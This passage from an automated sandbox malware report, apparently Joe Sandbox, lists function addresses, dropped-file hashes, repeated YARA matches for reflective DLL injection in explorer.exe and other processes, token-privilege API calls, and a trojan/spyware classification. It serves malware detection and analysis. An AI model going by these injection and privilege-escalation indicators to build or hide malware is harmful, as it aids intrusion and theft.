              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2510B8412_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F8B2012_2_00007FF7F24F8B20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F25073F412_2_00007FF7F25073F4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F25133BC12_2_00007FF7F25133BC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2500C6412_2_00007FF7F2500C64
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250148412_2_00007FF7F2501484
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2502CC412_2_00007FF7F2502CC4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F251518C12_2_00007FF7F251518C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250D20012_2_00007FF7F250D200
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F25091B012_2_00007FF7F25091B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2500A6012_2_00007FF7F2500A60
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250128012_2_00007FF7F2501280
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2518A3812_2_00007FF7F2518A38
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2507AAC12_2_00007FF7F2507AAC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2501F3012_2_00007FF7F2501F30
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2512F2012_2_00007FF7F2512F20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F251572812_2_00007FF7F2515728
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250FBD812_2_00007FF7F250FBD8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F979B12_2_00007FF7F24F979B
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F9FCD12_2_00007FF7F24F9FCD
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250107412_2_00007FF7F2501074
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250D88012_2_00007FF7F250D880
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250504012_2_00007FF7F2505040
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F25028C012_2_00007FF7F25028C0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F250CD6C12_2_00007FF7F250CD6C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F95FB12_2_00007FF7F24F95FB
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2500E7012_2_00007FF7F2500E70
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2514F1012_2_00007FF7F2514F10
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2515C7413_2_00007FF7F2515C74
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F100013_2_00007FF7F24F1000
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2514F1013_2_00007FF7F2514F10
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2510B8413_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F8B2013_2_00007FF7F24F8B20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F25073F413_2_00007FF7F25073F4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250FBD813_2_00007FF7F250FBD8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F25133BC13_2_00007FF7F25133BC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2500C6413_2_00007FF7F2500C64
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250148413_2_00007FF7F2501484
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2502CC413_2_00007FF7F2502CC4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F251518C13_2_00007FF7F251518C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250D20013_2_00007FF7F250D200
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F25091B013_2_00007FF7F25091B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2500A6013_2_00007FF7F2500A60
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250128013_2_00007FF7F2501280
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2518A3813_2_00007FF7F2518A38
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2507AAC13_2_00007FF7F2507AAC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2501F3013_2_00007FF7F2501F30
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2512F2013_2_00007FF7F2512F20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F251572813_2_00007FF7F2515728
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250FBD813_2_00007FF7F250FBD8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F979B13_2_00007FF7F24F979B
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F9FCD13_2_00007FF7F24F9FCD
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250107413_2_00007FF7F2501074
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250D88013_2_00007FF7F250D880
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250504013_2_00007FF7F2505040
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F25028C013_2_00007FF7F25028C0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F250CD6C13_2_00007FF7F250CD6C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F95FB13_2_00007FF7F24F95FB
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2500E7013_2_00007FF7F2500E70
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F2C4813_2_00007FFBBB8F2C48
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88FBE013_2_00007FFBBB88FBE0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8E7BFC13_2_00007FFBBB8E7BFC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB885B5C13_2_00007FFBBB885B5C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB89DAC013_2_00007FFBBB89DAC0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F2A6813_2_00007FFBBB8F2A68
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8928B013_2_00007FFBBB8928B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88D03013_2_00007FFBBB88D030
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB882FA013_2_00007FFBBB882FA0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8AF00013_2_00007FFBBB8AF000
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88FF6013_2_00007FFBBB88FF60
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB925E6413_2_00007FFBBB925E64
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8B0E1513_2_00007FFBBB8B0E15
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB928DF813_2_00007FFBBB928DF8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8AC42913_2_00007FFBBB8AC429
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88233C13_2_00007FFBBB88233C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88C36013_2_00007FFBBB88C360
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8A238413_2_00007FFBBB8A2384
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8A62D013_2_00007FFBBB8A62D0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88831013_2_00007FFBBB888310
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB89030013_2_00007FFBBB890300
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88327413_2_00007FFBBB883274
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8A120013_2_00007FFBBB8A1200
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB89D12013_2_00007FFBBB89D120
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB9100BC13_2_00007FFBBB9100BC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88885413_2_00007FFBBB888854
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8C274013_2_00007FFBBB8C2740
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8916D013_2_00007FFBBB8916D0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8826F813_2_00007FFBBB8826F8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB89F5A413_2_00007FFBBB89F5A4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB88F52013_2_00007FFBBB88F520
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E37B013_2_00007FFBC31E37B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E1A8013_2_00007FFBC31E1A80
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E521C13_2_00007FFBC31E521C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E263013_2_00007FFBC31E2630
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E1A8013_2_00007FFBC31E1A80
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E3CF013_2_00007FFBC31E3CF0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E314013_2_00007FFBC31E3140
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E2D3013_2_00007FFBC31E2D30
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F6AE413_2_00007FFBC31F6AE4
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F2DD013_2_00007FFBC31F2DD0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC32171CC13_2_00007FFBC32171CC
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC321D13013_2_00007FFBC321D130
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe 50F3AF8A4B14A6E63CDC7817ECB482D7045458B43D786D580B51E8F12D762106
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe 94D7D12AE53CE97F38D8890383C2317CE03D45BD6ECAF0E0B9165C7066CD300C
              Source: C:\Windows\System32\svchost.exeCode function: String function: 00007FF67E6D14EC appears 106 times
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: String function: 00007FF7E83C14EC appears 106 times
              Source: C:\Windows\System32\msiexec.exeCode function: String function: 00007FF6345C14EC appears 106 times
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: String function: 00007FF7F24F25F0 appears 100 times
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: String function: 00007FF7F24F2760 appears 36 times
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCode function: String function: 00007FF6C5DB14EC appears 106 times
              Source: C:\Windows\System32\audiodg.exeCode function: String function: 00007FF6EC8414EC appears 106 times
              Source: api-ms-win-core-file-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-memory-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-stdio-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-debug-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-handle-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-sysinfo-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-filesystem-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-heap-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-rtlsupport-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-errorhandling-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-1.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-heap-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processenvironment-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-synch-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-namedpipe-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-timezone-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-datetime-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-interlocked-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-conio-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-libraryloader-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-time-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-process-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-runtime-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-math-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-string-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-string-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-utility-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-profile-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-localization-l1-2-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-util-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-console-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-file-l2-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-core-processthreads-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-locale-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-environment-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: api-ms-win-crt-convert-l1-1-0.dll.12.drStatic PE information: No import functions for PE file found
              Source: uFVgJVXaEU.exeBinary or memory string: OriginalFilename vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000002.1413377879.00007FF7E83C9000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412719401.0000000002E70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412262297.0000000002EC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exe, 00000000.00000003.1412210285.0000000002E70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: uFVgJVXaEU.exeBinary or memory string: OriginalFilenameServices.exe2 vs uFVgJVXaEU.exe
              Source: 5.0.explorer.exe.e100000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.8220535.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e080535.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c1b2c20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ff40000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e100000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.dfa0000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c166810.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.dfa0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.dfa0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 4.3.msiexec.exe.21e1f7d9930.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.ded0535.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 3.2.svchost.exe.1f00d07e000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e080535.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e080535.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 2.3.audiodg.exe.1a265740d60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 3.2.svchost.exe.1f00d07e000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e080535.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ded0535.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.dfa0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 2.3.audiodg.exe.1a265740d60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.c1b2c20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ded0535.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c166810.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.ff40000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.e100000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.e100000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.ded0535.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.3.explorer.exe.c1b2c20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.2.explorer.exe.8220535.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c1b2c20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 4.3.msiexec.exe.21e1f7d9930.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 5.0.explorer.exe.c166810.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000000.1436005236.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000003.00000002.2672467655.000001F00D07E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@29/57@0/1
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F29E0 GetLastError,FormatMessageW,MessageBoxW,12_2_00007FF7F24F29E0
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF7E83C40A4
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6D40A4 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,3_2_00007FF67E6D40A4
